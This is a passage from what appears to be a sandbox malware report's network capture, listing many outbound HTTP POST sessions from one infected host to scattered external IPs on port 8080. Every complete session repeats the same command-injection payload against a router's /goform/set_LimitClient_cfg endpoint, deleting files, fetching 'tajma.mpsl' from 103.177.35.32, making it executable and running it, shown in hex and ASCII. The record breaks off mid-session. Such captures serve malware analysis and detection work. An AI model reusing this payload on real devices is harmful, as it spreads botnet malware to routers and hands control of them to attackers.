                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2029192.168.2.233298886.0.195.138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423578024 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2030192.168.2.235011884.171.16.1508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423589945 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2031192.168.2.2357954156.72.82.1098080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423604012 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2032192.168.2.235419294.92.216.948080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423621893 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2033192.168.2.2338232150.66.16.1738080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423636913 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2034192.168.2.235404084.140.197.1128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423648119 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2035192.168.2.2357122187.63.77.908080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423666000 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2036192.168.2.2356534212.141.207.1838080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423666000 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2037192.168.2.234998257.38.199.1388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423677921 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2038192.168.2.235842241.127.171.1158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423707962 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2039192.168.2.2356604100.208.247.1278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423721075 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2040192.168.2.2342016141.101.42.1828080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423741102 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2041192.168.2.234225849.61.19.2208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423753977 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2042192.168.2.2335686160.25.244.1568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423768997 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2043192.168.2.235756241.102.79.668080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423787117 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2044192.168.2.233766677.210.47.998080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423801899 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2045192.168.2.234445831.21.228.2178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423830986 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2046192.168.2.2340896118.88.114.498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423832893 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2047192.168.2.235877438.210.138.348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423849106 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2048192.168.2.2338322152.45.12.928080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423871040 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2049192.168.2.2339848174.130.169.2558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.423923016 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2050192.168.2.2352712149.177.123.2418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.427602053 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2051192.168.2.2349624197.232.247.2248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.427658081 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
